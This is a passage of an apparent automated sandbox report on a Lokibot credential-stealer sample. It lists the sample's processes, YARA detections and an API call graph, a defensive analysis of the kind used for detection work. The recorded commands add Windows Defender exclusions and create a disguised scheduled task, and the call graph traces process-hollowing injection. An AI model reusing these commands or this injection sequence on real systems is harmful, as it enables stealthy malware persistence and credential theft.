                            Jan 11, 2025 07:46:26.689274073 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:26 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:01:44:20
                            Start date:11/01/2025
                            Path:C:\Users\user\Desktop\YvVDV4cbjy.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\YvVDV4cbjy.exe"
                            Imagebase:0xc10000
                            File size:539'648 bytes
                            MD5 hash:DE71DA3A473F5CDB285D30A1D6DD333B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Reputation:low
                            Has exited:true

                            Target ID:3
                            Start time:01:44:21
                            Start date:11/01/2025
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"
                            Imagebase:0xed0000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:01:44:21
                            Start date:11/01/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:01:44:22
                            Start date:11/01/2025
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
                            Imagebase:0xed0000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:01:44:22
                            Start date:11/01/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:01:44:22
                            Start date:11/01/2025
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp"
                            Imagebase:0x7a0000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:01:44:22
                            Start date:11/01/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:01:44:22
                            Start date:11/01/2025
                            Path:C:\Users\user\Desktop\YvVDV4cbjy.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\YvVDV4cbjy.exe"
                            Imagebase:0xb40000
                            File size:539'648 bytes
                            MD5 hash:DE71DA3A473F5CDB285D30A1D6DD333B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000009.00000002.3266647288.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            Target ID:10
                            Start time:01:44:23
                            Start date:11/01/2025
                            Path:C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
                            Imagebase:0x440000
                            File size:539'648 bytes
                            MD5 hash:DE71DA3A473F5CDB285D30A1D6DD333B
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 79%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            Target ID:11
                            Start time:01:44:25
                            Start date:11/01/2025
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff6ef0c0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:01:44:27
                            Start date:11/01/2025
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp"
                            Imagebase:0x7a0000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:01:44:27
                            Start date:11/01/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:14
                            Start time:01:44:27
                            Start date:11/01/2025
                            Path:C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
                            Imagebase:0x280000
                            File size:539'648 bytes
                            MD5 hash:DE71DA3A473F5CDB285D30A1D6DD333B
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:01:44:27
                            Start date:11/01/2025
                            Path:C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
                            Imagebase:0x830000
                            File size:539'648 bytes
                            MD5 hash:DE71DA3A473F5CDB285D30A1D6DD333B
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: Loki_1, Description: Loki Payload, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:11.9%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:5%
                              Total number of Nodes:299
                              Total number of Limit Nodes:9
                              execution_graph 22889 77b38e9 22890 77b3901 22889->22890 22894 77b5eb3 22890->22894 22898 77b5ec0 22890->22898 22891 77b3934 22895 77b5ef3 22894->22895 22896 77b5f61 22895->22896 22902 77b6248 22895->22902 22896->22891 22899 77b5ef3 22898->22899 22900 77b5f61 22899->22900 22901 77b6248 ResumeThread 22899->22901 22900->22891 22901->22900 22903 77b624c 22902->22903 22904 77b62fa ResumeThread 22903->22904 22905 77b6256 22903->22905 22906 77b6321 22904->22906 22905->22896 22906->22896 23261 77bacc8 23262 77bae53 23261->23262 23264 77bacee 23261->23264 23264->23262 23265 77b3400 23264->23265 23266 77baf48 PostMessageW 23265->23266 23268 77bafb4 23266->23268 23268->23264 22907 13c4668 22908 13c467a 22907->22908 22909 13c4686 22908->22909 22913 13c4778 22908->22913 22918 13c3e28 22909->22918 22911 13c46a5 22914 13c479d 22913->22914 22922 13c4878 22914->22922 22926 13c4888 22914->22926 22919 13c3e33 22918->22919 22934 13c5d1c 22919->22934 22921 13c6ffb 22921->22911 22924 13c4888 22922->22924 22923 13c498c 22924->22923 22930 13c44b0 22924->22930 22928 13c48af 22926->22928 22927 13c498c 22927->22927 22928->22927 22929 13c44b0 CreateActCtxA 22928->22929 22929->22927 22931 13c5918 CreateActCtxA 22930->22931 22933 13c59db 22931->22933 22935 13c5d27 22934->22935 22938 13c5d3c 22935->22938 22937 13c72b5 22937->22921 22939 13c5d47 22938->22939 22942 13c5d6c 22939->22942 22941 13c739a 22941->22937 22943 13c5d77 22942->22943 22946 13c5d9c 22943->22946 22945 13c748d 22945->22941 22947 13c5da7 22946->22947 22949 13c89eb 22947->22949 22953 13cac90 22947->22953 22948 13c8a29 22948->22945 22949->22948 22957 13ccd90 22949->22957 22968 13ccd81 22949->22968 22979 13cb0d0 22953->22979 22982 13cb0c1 22953->22982 22954 13caca6 22954->22949 22958 13ccdb1 22957->22958 22960 13ccdd5 22958->22960 22990 13cd348 22958->22990 22994 13cd30d 22958->22994 22998 13cd301 22958->22998 23002 13cd311 22958->23002 23006 13cd3a0 22958->23006 23011 13cd305 22958->23011 23015 13cd309 22958->23015 23019 13cd339 22958->23019 22960->22948 22970 13ccdb1 22968->22970 22969 13ccdd5 22969->22948 22970->22969 22971 13cd30d GetModuleHandleW 22970->22971 22972 13cd348 GetModuleHandleW 22970->22972 22973 13cd339 GetModuleHandleW 22970->22973 22974 13cd309 GetModuleHandleW 22970->22974 22975 13cd305 GetModuleHandleW 22970->22975 22976 13cd3a0 GetModuleHandleW 22970->22976 22977 13cd311 GetModuleHandleW 22970->22977 22978 13cd301 GetModuleHandleW 22970->22978 22971->22969 22972->22969 22973->22969 22974->22969 22975->22969 22976->22969 22977->22969 22978->22969 22985 13cb1c8 22979->22985 22980 13cb0df 22980->22954 22983 13cb0df 22982->22983 22984 13cb1c8 GetModuleHandleW 22982->22984 22983->22954 22984->22983 22986 13cb1fc 22985->22986 22987 13cb1d9 22985->22987 22986->22980 22987->22986 22988 13cb400 GetModuleHandleW 22987->22988 22989 13cb42d 22988->22989 22989->22980 22991 13cd355 22990->22991 22992 13cd38f 22991->22992 23023 13cd170 22991->23023 22992->22960 22995 13cd2f6 22994->22995 22996 13cd38f 22995->22996 22997 13cd170 GetModuleHandleW 22995->22997 22996->22960 22997->22996 22999 13cd2f6 22998->22999 23000 13cd170 GetModuleHandleW 22999->23000 23001 13cd38f 22999->23001 23000->23001 23001->22960 23003 13cd2f6 23002->23003 23004 13cd38f 23003->23004 23005 13cd170 GetModuleHandleW 23003->23005 23004->22960 23005->23004 23007 13cd360 23006->23007 23008 13cd3d5 23006->23008 23009 13cd38f 23007->23009 23010 13cd170 GetModuleHandleW 23007->23010 23008->22960 23009->22960 23010->23009 23012 13cd2f6 23011->23012 23013 13cd38f 23012->23013 23014 13cd170 GetModuleHandleW 23012->23014 23013->22960 23014->23013 23016 13cd2f6 23015->23016 23017 13cd170 GetModuleHandleW 23016->23017 23018 13cd38f 23016->23018 23017->23018 23018->22960 23020 13cd2f6 23019->23020 23020->23019 23021 13cd38f 23020->23021 23022 13cd170 GetModuleHandleW 23020->23022 23021->22960 23022->23021 23024 13cd175 23023->23024 23026 13cdca0 23024->23026 23027 13cd28c 23024->23027 23028 13cd297 23027->23028 23029 13c5d9c GetModuleHandleW 23028->23029 23030 13cdd0f 23029->23030 23030->23026 23256 77b3653 23257 77b3664 23256->23257 23259 77b5eb3 ResumeThread 23257->23259 23260 77b5ec0 ResumeThread 23257->23260 23258 77b3697 23259->23258 23260->23258 23031 77b71e1 23032 77b71eb 23031->23032 23033 77b72c2 23031->23033 23037 77b9a38 23032->23037 23055 77b9a96 23032->23055 23074 77b9a01 23032->23074 23038 77b9a3b 23037->23038 23039 77b9a76 23038->23039 23092 77ba5d9 23038->23092 23098 77ba0e5 23038->23098 23103 77ba0a1 23038->23103 23108 77b9eec 23038->23108 23114 77ba08f 23038->23114 23119 77b9d68 23038->23119 23125 77ba24b 23038->23125 23131 77ba1d4 23038->23131 23137 77ba296 23038->23137 23141 77ba230 23038->23141 23147 77ba0d2 23038->23147 23152 77ba812 23038->23152 23156 77b9fd3 23038->23156 23161 77ba05d 23038->23161 23166 77b9d59 23038->23166 23039->23033 23057 77b9a24 23055->23057 23058 77b9a99 23055->23058 23056 77b99ea 23056->23033 23057->23056 23059 77ba5d9 2 API calls 23057->23059 23060 77b9d59 2 API calls 23057->23060 23061 77ba05d 2 API calls 23057->23061 23062 77b9fd3 2 API calls 23057->23062 23063 77ba812 2 API calls 23057->23063 23064 77ba0d2 2 API calls 23057->23064 23065 77ba230 2 API calls 23057->23065 23066 77ba296 2 API calls 23057->23066 23067 77ba1d4 2 API calls 23057->23067 23068 77ba24b 2 API calls 23057->23068 23069 77b9d68 2 API calls 23057->23069 23070 77ba08f 2 API calls 23057->23070 23071 77b9eec 2 API calls 23057->23071 23072 77ba0a1 2 API calls 23057->23072 23073 77ba0e5 2 API calls 23057->23073 23058->23033 23059->23056 23060->23056 23061->23056 23062->23056 23063->23056 23064->23056 23065->23056 23066->23056 23067->23056 23068->23056 23069->23056 23070->23056 23071->23056 23072->23056 23073->23056 23076 77b9a24 23074->23076 23075 77b99ea 23075->23033 23076->23075 23077 77ba5d9 2 API calls 23076->23077 23078 77b9d59 2 API calls 23076->23078 23079 77ba05d 2 API calls 23076->23079 23080 77b9fd3 2 API calls 23076->23080 23081 77ba812 2 API calls 23076->23081 23082 77ba0d2 2 API calls 23076->23082 23083 77ba230 2 API calls 23076->23083 23084 77ba296 2 API calls 23076->23084 23085 77ba1d4 2 API calls 23076->23085 23086 77ba24b 2 API calls 23076->23086 23087 77b9d68 2 API calls 23076->23087 23088 77ba08f 2 API calls 23076->23088 23089 77b9eec 2 API calls 23076->23089 23090 77ba0a1 2 API calls 23076->23090 23091 77ba0e5 2 API calls 23076->23091 23077->23075 23078->23075 23079->23075 23080->23075 23081->23075 23082->23075 23083->23075 23084->23075 23085->23075 23086->23075 23087->23075 23088->23075 23089->23075 23090->23075 23091->23075 23093 77ba1ec 23092->23093 23094 77ba1fe 23093->23094 23172 77babe8 23093->23172 23177 77babd7 23093->23177 23182 77bac20 23093->23182 23094->23094 23099 77ba0f7 23098->23099 23192 77b6868 23099->23192 23196 77b6870 23099->23196 23100 77ba534 23104 77ba0aa 23103->23104 23200 77b6929 23104->23200 23204 77b6930 23104->23204 23105 77ba017 23105->23039 23110 77b9e21 23108->23110 23109 77b9e3e 23109->23039 23110->23109 23208 77b6bb8 23110->23208 23212 77b6bac 23110->23212 23115 77b9fd7 23114->23115 23117 77b6929 WriteProcessMemory 23115->23117 23118 77b6930 WriteProcessMemory 23115->23118 23116 77ba6e2 23117->23116 23118->23116 23121 77b9d9b 23119->23121 23120 77b9e3e 23120->23039 23121->23120 23123 77b6bb8 CreateProcessA 23121->23123 23124 77b6bac CreateProcessA 23121->23124 23122 77b9f87 23123->23122 23124->23122 23126 77ba1eb 23125->23126 23127 77b9fb2 23125->23127 23126->23127 23128 77babe8 2 API calls 23126->23128 23129 77bac20 2 API calls 23126->23129 23130 77babd7 2 API calls 23126->23130 23127->23039 23128->23127 23129->23127 23130->23127 23132 77ba1da 23131->23132 23134 77babe8 2 API calls 23132->23134 23135 77bac20 2 API calls 23132->23135 23136 77babd7 2 API calls 23132->23136 23133 77ba1fe 23134->23133 23135->23133 23136->23133 23216 77b6a19 23137->23216 23220 77b6a20 23137->23220 23138 77ba2b8 23142 77ba1ec 23141->23142 23144 77babe8 2 API calls 23142->23144 23145 77bac20 2 API calls 23142->23145 23146 77babd7 2 API calls 23142->23146 23143 77ba1fe 23144->23143 23145->23143 23146->23143 23148 77ba0df 23147->23148 23150 77b6929 WriteProcessMemory 23148->23150 23151 77b6930 WriteProcessMemory 23148->23151 23149 77ba642 23150->23149 23151->23149 23224 77b6359 23152->23224 23228 77b6360 23152->23228 23153 77ba82c 23157 77b9fd7 23156->23157 23159 77b6929 WriteProcessMemory 23157->23159 23160 77b6930 WriteProcessMemory 23157->23160 23158 77ba6e2 23159->23158 23160->23158 23162 77ba723 23161->23162 23232 77baad8 23162->23232 23237 77baac7 23162->23237 23163 77ba73c 23167 77b9d60 23166->23167 23168 77b9e3e 23167->23168 23170 77b6bb8 CreateProcessA 23167->23170 23171 77b6bac CreateProcessA 23167->23171 23168->23039 23169 77b9f87 23170->23169 23171->23169 23173 77babeb 23172->23173 23175 77b6248 ResumeThread 23173->23175 23188 77b62b0 23173->23188 23174 77bac10 23174->23094 23175->23174 23178 77babe4 23177->23178 23180 77b6248 ResumeThread 23178->23180 23181 77b62b0 ResumeThread 23178->23181 23179 77bac10 23179->23094 23180->23179 23181->23179 23183 77babef 23182->23183 23185 77bac2a 23182->23185 23186 77b6248 ResumeThread 23183->23186 23187 77b62b0 ResumeThread 23183->23187 23184 77bac10 23184->23094 23185->23094 23186->23184 23187->23184 23189 77b62f0 ResumeThread 23188->23189 23191 77b6321 23189->23191 23191->23174 23193 77b686c VirtualAllocEx 23192->23193 23195 77b68ed 23193->23195 23195->23100 23197 77b6873 VirtualAllocEx 23196->23197 23199 77b68ed 23197->23199 23199->23100 23201 77b692c WriteProcessMemory 23200->23201 23203 77b69cf 23201->23203 23203->23105 23205 77b6933 WriteProcessMemory 23204->23205 23207 77b69cf 23205->23207 23207->23105 23209 77b6bbb CreateProcessA 23208->23209 23211 77b6e03 23209->23211 23213 77b6b76 23212->23213 23213->23212 23214 77b6da6 CreateProcessA 23213->23214 23215 77b6e03 23214->23215 23217 77b6a1c ReadProcessMemory 23216->23217 23219 77b6aaf 23217->23219 23219->23138 23221 77b6a23 ReadProcessMemory 23220->23221 23223 77b6aaf 23221->23223 23223->23138 23225 77b635c Wow64SetThreadContext 23224->23225 23227 77b63ed 23225->23227 23227->23153 23229 77b6363 Wow64SetThreadContext 23228->23229 23231 77b63ed 23229->23231 23231->23153 23233 77baadb 23232->23233 23235 77b6359 Wow64SetThreadContext 23233->23235 23236 77b6360 Wow64SetThreadContext 23233->23236 23234 77bab03 23234->23163 23235->23234 23236->23234 23238 77baacc 23237->23238 23240 77b6359 Wow64SetThreadContext 23238->23240 23241 77b6360 Wow64SetThreadContext 23238->23241 23239 77bab03 23239->23163 23240->23239 23241->23239 23242 13cd460 23243 13cd4a6 23242->23243 23247 13cd62f 23243->23247 23250 13cd640 23243->23250 23244 13cd593 23253 13cb0b4 23247->23253 23251 13cd66e 23250->23251 23252 13cb0b4 DuplicateHandle 23250->23252 23251->23244 23252->23251 23254 13cd6a8 DuplicateHandle 23253->23254 23255 13cd66e 23254->23255 23255->23244
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID: fbq
                              • API String ID: 0-3185938239
                              • Opcode ID: 9157f922582d89dd2b72d6c8fe0e344b4951db3d3ee175695bea468b2857d69d
                              • Instruction ID: 67df2363246ffe49120a5ce866333509e58d68528614cca412ff6636ddd88093
                              • Opcode Fuzzy Hash: 9157f922582d89dd2b72d6c8fe0e344b4951db3d3ee175695bea468b2857d69d
                              • Instruction Fuzzy Hash: 8281E674E00209DFDB09DFA9D894ADEBBB6FF88300F148529D409AB368DB349905CF90
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID: fbq
                              • API String ID: 0-3185938239
                              • Opcode ID: 75345ded796f7c8e60830dbded53b13b543d117dd491e53f5220ee9ea322a3bb
                              • Instruction ID: 9235246638a9ad7cd01fc7570ca75d7a4e3c2e49cde3c80b55086690f0009a38
                              • Opcode Fuzzy Hash: 75345ded796f7c8e60830dbded53b13b543d117dd491e53f5220ee9ea322a3bb
                              • Instruction Fuzzy Hash: 3481E774E00209DFDB09DFA9D9949DEBBB6FF88304F148529D409AB369DB349905CF90
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0cc4b2065816405e7fc200f1cc006a00a098eec398dcf1169a815aeadd70ebf7
